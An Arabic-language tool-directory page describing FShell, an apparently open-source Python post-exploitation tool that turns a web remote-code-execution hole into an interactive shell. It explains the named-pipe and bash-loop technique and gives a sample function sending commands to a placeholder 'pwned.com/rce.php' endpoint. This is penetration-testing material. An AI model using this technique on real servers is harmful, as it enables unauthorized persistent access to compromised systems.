Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
FShell — تطبيقي بلغة Python3 لأداة Forward Shell | Kitploit
أدوات/GitHubGitHub/hypnoze57/fshell
الاستغلالما بعد الاستغلالاختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubhypnoze57/fshell

FShell

تطبيقي بلغة Python3 لأداة Forward Shell

عرض المستودع
385منذ 7 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

FShell

الوصف

FShell هو تطبيقي لـ Forward Shell. صُمم للحصول على tty تفاعلي باستخدام تنفيذ التعليمات البرمجية عن بُعد عبر بروتوكول بدون حالة (مثل HTTP).

لماذا يجب أن أستخدم Forward Shell؟

  • الخادم البعيد لا يستطيع الوصول إلى الإنترنت، فلا توجد إمكانية لعمل reverse shell
  • لا أريد أن يبدأ الخادم اتصالًا صادرًا جديدًا أو يعرض خدمة جديدة (فقط استخدام الخدمة المعرّضة والهشّة)

ومع ذلك، فإن لها أيضًا عيوبًا:

  • العديد من الطلبات في الثانية (في حالة خادم ويب، سيولّد الكثير من سجلات الوصول)
  • ليست تفاعلية بالكامل: لا يوجد إكمال تلقائي (نظريًا يمكن تنفيذه لكنه سيولّد كمية هائلة من الطلبات)، وتذكر أن مدخلاتك تُرسل إلى سكربت بايثون ثم إلى الخادم البعيد.

يمكن تغيير تكرار الطلبات بتعديل المتغير BEACONING_DELAY.

المتطلبات

على جهاز المهاجم

Python3 والمكتبات:

  • requests
  • termcolor

على الهدف

يُدعم نظام Linux فقط في الوقت الحالي ويتطلب أوامر/أدوات أساسية على النظام البعيد:

  • python2 (ووحدة pty)
  • bash
  • mkfifo
  • cat
  • tail
  • ps
  • grep
  • awk
  • kill

الاستخدام

عدّل المتغير WRITABLE_FOLDER إذا لم يكن /tmp متاحًا للكتابة أو إذا كان لديك خيار أفضل (فضّل /dev/shm)

يجب عليك إعادة تعريف دالة execute لتنفيذ التعليمات البرمجية عن بُعد:

root@kitploit:~
def execute(cmd, verbose=False, timeout=None):
    """
    :cmd      Raw shell command to execute on the remote system
    :timetout MANDATORY: Used to kill blocking execution loop (used in named pipe creation).
              If you cannot, put named pipe creation in separated thread
    :verbose  Print full cmd executed on the remote system (Debug mode)
    """
    # Put your RCE code here
    r = requests.get('http://pwned.com/rce.php?cmd=%s' % (b64encode(cmd)), timeout=timeout)
    return r.text.strip() # You can apply formating if the output is not only the output of command

الأوامر

  • help_shell: عرض مساعدة الأوامر
  • get_sessid: عرض معرف الجلسة الحالي على الخادم البعيد
  • upgrade_shell: بدء pty عن بُعد باستخدام بايثون لإنشاء shell تفاعلي
  • exit_shell: إنهاء الـ shell البعيد "بشكل صحيح". إذا كنت متصلًا بمستخدم آخر غير الأول، فاخرج بشكل طبيعي قبل ذلك.

عرض توضيحي

FShell Demo

كيف يعمل

المفاهيم بسيطة جدًا.

أولاً تحتاج إلى إنشاء named pipe على النظام البعيد. سيُستخدم لإرسال الأوامر إلى الـ shell
mkfifo /tmp/input.

ثم أنشئ حلقة bash تقرأ الـ named pipe باستمرار وترسل محتواه إلى عملية bash تفاعلية ترسل stdin وstderr إلى ملف إخراج.
tail -f /tmp/input | /bin/bash -i > /tmp/output 2>&1

[قراءة الـ named pipe] -> [تنفيذ محتوى الـ named pipe] -> [إرسال stdin/stderr إلى ملف الإخراج] -> [العودة لقراءة الـ named pipe بسبب خيار '-f' في tail]

الجزء التالي هو بدء مؤشر ترابط بايثون ينفذ cat /tmp/output بانتظام للحصول على مخرجات الـ shell.
إذا وجد المؤشر بيانات، فسيمسح محتوى ملف الإخراج باستخدام echo '' > /tmp/output
نصائح: لتجنب تسجيل أخطاء لملف غير موجود، ينفذ السكربت أمر 'id' قبل بدء مؤشر 'GetOutput' لإنشاء ملف الإخراج.

واحدة من الخطوات الأخيرة هي الحصول على مدخلات المستخدم من سكربت بايثون وإرسالها إلى الـ named pipe
echo USERCMD > /tmp/input

والخدعة الأخيرة لاستعادة tty تفاعلي عن بُعد هي أمر 'upgrade_shell'. ينفذ هذا الأمر python -c 'import pty;pty.spawn("/bin/bash")' (وبعض أوامر export والاختصارات) لإنشاء tty حقيقي للعملية الحالية (المستخدمة في حلقة الـ named pipe)

شكرًا

شكرًا لـ @ippsec، لم أكن أعلم أن شيئًا كهذا ممكنًا قبل مشاهدة هذا الفيديو Stratosphere HTB Write Up!

أتمنى أن تستمتع به!

تنزيل الأداة